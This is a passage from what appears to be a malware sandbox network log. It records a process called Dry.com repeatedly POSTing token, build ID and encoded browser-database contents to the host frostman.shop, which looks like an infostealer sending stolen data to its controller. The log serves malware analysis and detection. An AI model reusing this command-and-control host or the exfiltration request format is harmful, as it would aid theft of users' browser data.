                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 5a 4d 59 35 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 4d 59 35 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 4d 59 35 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------PZMY5PHVAI5F3EKF37QQContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------PZMY5PHVAI5F3EKF37QQContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------PZMY5PHVAI5F3EKF37QQCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:19 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:21 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.550044116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:20 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----TJW47QQ1NYCJM7GVAIE3
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:20 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------TJW47QQ1NYCJM7GVAIE3Content-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------TJW47QQ1NYCJM7GVAIE3Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------TJW47QQ1NYCJM7GVAIE3Cont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:21 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          24192.168.2.550063116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:26 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2DB1DJMYMYM7YUS2VKXT
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 509
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:26 UTC509OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------2DB1DJMYMYM7YUS2VKXTContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------2DB1DJMYMYM7YUS2VKXTContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------2DB1DJMYMYM7YUS2VKXTCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:27 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          25192.168.2.550065116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 207993
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------9ZUS2DTRQIE3EUS26P8GCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
